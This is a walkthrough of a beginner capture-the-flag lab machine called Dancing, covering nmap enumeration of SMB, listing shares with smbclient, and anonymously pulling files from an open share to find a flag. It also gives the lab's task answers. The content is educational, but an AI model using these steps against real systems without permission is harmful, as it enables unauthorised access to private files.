Lab Objective: Dancing is the third machine in the Starting Point Tier 0 series. It focuses on SMB — the Server Message Block protocol — which allows shared access to files, printers, and serial ports between endpoints on a network.
Important Considerations
- Port 445 TCP is reserved for SMB. It is used directly with no need for the NetBIOS layer.
- Windows — SMB is predominantly a Windows protocol, deeply integrated with networking and Active Directory. Many professionals still block it at the firewall level because of its history of exploitation.
- Exploitation risk — Port 445 and SMB shares are prone to being exploited, especially when accessed remotely with misconfigured permissions. Guest accounts and anonymous log-ons, as with FTP, are a significant vulnerability.
Enumeration
As always, enumeration is the first and most critical step. We are gathering information about the target system before touching anything.
Task 1 — What does SMB stand for?
Answer: Server Message Block. Scan with sudo nmap -sV [IP].
Task 2 — What port does SMB use?
Answer: 445.
Task 3 — What is the service name for port 445 in the Nmap scan?
Answer: microsoft-ds.
Task 4 — What flag with smbclient lists the available shares?
Answer: -L. Install smbclient if needed: sudo apt-get install smbclient.
When smbclient connects, it checks the authentication level. Without specifying a username it reverts to your local username. In a real engagement you would have done due diligence first — here we have two options: anonymous and guest authentication.
Establishing a Foothold
Task 5 — How many shares are there on Dancing?
Answer: 4. The shares are: ADMIN$, C$, IPC$, and WorkShares.
We test each with: smbclient \\\\{targetIP}\\ADMIN$ — leaving the password field blank.
Task 6 — Which share can we access with a blank password?
Answer: WorkShares.
Task 7 — What command downloads files from within the SMB shell?
Answer: get. Navigating the directory reveals two folders — Amy.J and James.P — each containing a text file.
\> ls
\> cd Amy.J
\Amy.J\> get worknotes.txt
Task 8 — Submit the Flag.
Answer: Follow the steps above to find the flag inside the downloaded files.
Final Thoughts
- Make sure smbclient is installed and up to date before attempting this.
- Always use the
helpcommand when exploring an unfamiliar service inside the shell. - Spend time reading documentation on what commands do — understanding the tool is more valuable than copying the command.